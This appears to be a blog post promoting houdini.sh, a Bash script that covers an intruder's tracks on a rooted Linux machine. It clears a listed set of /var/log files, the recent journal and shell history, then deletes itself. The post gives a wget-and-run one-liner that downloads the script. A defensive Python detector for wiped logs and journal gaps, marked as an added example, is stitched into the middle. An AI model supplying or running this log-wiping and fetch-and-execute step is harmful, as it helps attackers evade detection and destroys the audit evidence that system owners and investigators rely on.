Generally speaking, the pattern is always the same. You find a vulnerability, you exploit it, then comes the privilege escalation part. And that's it, you are root, master of the machine, and since you don't have time you install a backdoor somewhere, well hidden, to do what you want with this new machine later. And then... you log out! The first mistake has just been made.
Why? Because every action taken from the exploitation of the vulnerability to gaining root access is recorded in various files on the machine. It's akin to leaving your ID behind at the scene of a successful break-in: not a wise move.
To avoid this issue, I will be discussing houdini.sh, a Bash script that covers the tracks left on a machine with a single command, much like a magician.
But what exactly does houdini.sh do?
On Linux systems, the actions performed are recorded in a specific folder, typically /var/log. Each service may have its own file within that folder for recording any issues, which is helpful for debugging but not so much when trying to be discreet.
Here are the files that houdini.sh will clear:
/var/log/audit/audit.log # Audit TTY input
/var/log/auth.log # Authentication logs
/var/log/boot.log # System boot log
/var/log/cron.log # Crond logs
/var/log/faillog # Faillog records
/var/log/httpd # Apache access and error logs directory
/var/log/kern.log # Kernel logs
/var/log/lastlog # SSH Last Login
/var/log/lighttpd # Lighttpd access and error logs directory
/var/log/maillog # Mail server logs
/var/log/messages # General message and system related stuff
/var/log/mysqld.log # MySQL database server log file
/var/log/qmail # Qmail log directory
/var/log/secure # Authentication log
/var/log/system.log # System Log
/var/log/tallylog # Tally Log
/var/log/utmp # Login records file
/var/log/wtmp # Login records file
/var/log/yum.log # Yum command log file
It also erases the last 3 hours of entries from the journal, since journald stores its log data in a binary format instead of plaintext, so those entries cannot simply be truncated like the files above.
Another feature of houdini.sh is that it also deletes the history of all commands entered during the current SSH session.
Finally, the script deletes itself, leaving no trace behind.
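From the defender's side, the wipe described above has a footprint of its own: logs that are normally busy but are suddenly empty with a fresh modification time, and a multi-hour hole in the journal that ends at the present moment. The Python below is an added example, not part of the original post or of houdini.sh; it runs both heuristics over constructed in-memory records (the paths, sizes and timestamps are made up) rather than a live /var/log, so it runs offline.

```python
"""Detect the footprint a log wipe leaves behind.

Added example, not part of the original post or of houdini.sh. It works on
constructed in-memory records so it runs offline; on a real host the records
would come from os.stat() over /var/log and the timestamps from the journal.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class LogRecord:
    path: str
    size: int        # bytes
    mtime: datetime  # last modification time


def find_wiped_logs(records, now, window=timedelta(hours=3)):
    """Return paths of logs that are empty yet were modified recently.

    A normally busy log (auth.log, wtmp, ...) sitting at 0 bytes with a
    fresh mtime is the classic signature of a truncation.
    """
    return sorted(
        r.path for r in records
        if r.size == 0 and now - r.mtime <= window
    )


def find_journal_gaps(timestamps, max_gap=timedelta(minutes=30)):
    """Return (earlier, later) pairs of consecutive journal entries that are
    farther apart than max_gap. A host that logs constantly should not show
    a multi-hour hole, especially one ending at the current time."""
    ts = sorted(timestamps)
    return [
        (earlier, later)
        for earlier, later in zip(ts, ts[1:])
        if later - earlier > max_gap
    ]


def wipe_indicators(records, timestamps, now):
    """Combine both heuristics into one report."""
    return {
        "truncated_logs": find_wiped_logs(records, now),
        "journal_gaps": find_journal_gaps(timestamps),
    }


# --- constructed sample data (not taken from any real host) -----------------
NOW = datetime(2024, 1, 15, 14, 0, 0)
SAMPLE_LOGS = [
    LogRecord("/var/log/auth.log", 0, NOW - timedelta(minutes=5)),      # just truncated
    LogRecord("/var/log/wtmp", 0, NOW - timedelta(minutes=5)),          # just truncated
    LogRecord("/var/log/kern.log", 48213, NOW - timedelta(minutes=1)),  # still growing
    LogRecord("/var/log/yum.log", 0, NOW - timedelta(days=40)),         # empty but old: benign
]
# Entries every 10 minutes from 08:00 to 10:50, then nothing until 13:58.
SAMPLE_JOURNAL = (
    [NOW - timedelta(hours=6) + timedelta(minutes=10 * i) for i in range(18)]
    + [NOW - timedelta(minutes=2)]
)

if __name__ == "__main__":
    report = wipe_indicators(SAMPLE_LOGS, SAMPLE_JOURNAL, NOW)
    for path in report["truncated_logs"]:
        print(f"truncated recently: {path}")
    for earlier, later in report["journal_gaps"]:
        print(f"journal gap: {earlier:%H:%M} -> {later:%H:%M}")
```

Both checks are heuristics and will raise false positives after log rotation or a reboot, so they are best used to trigger a closer look rather than as proof on their own. The more robust defence is to forward logs to a remote collector as they are written: a script running as root on the host can always edit what is stored locally, but not what has already left the machine.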
Convenient, isn't it?
If the terminal is your magic wand then the incantation is the following:
wget https://gitlab.com/-/snippets/2150636/raw/main/houdini.sh && sh houdini.sh
And boom! You just disappeared and succeeded in your first magic trick 🧙
The script is open source and available on GitLab:
Use it wisely! On that note, I'm going back to practicing new magic tricks!
Thanks for reading!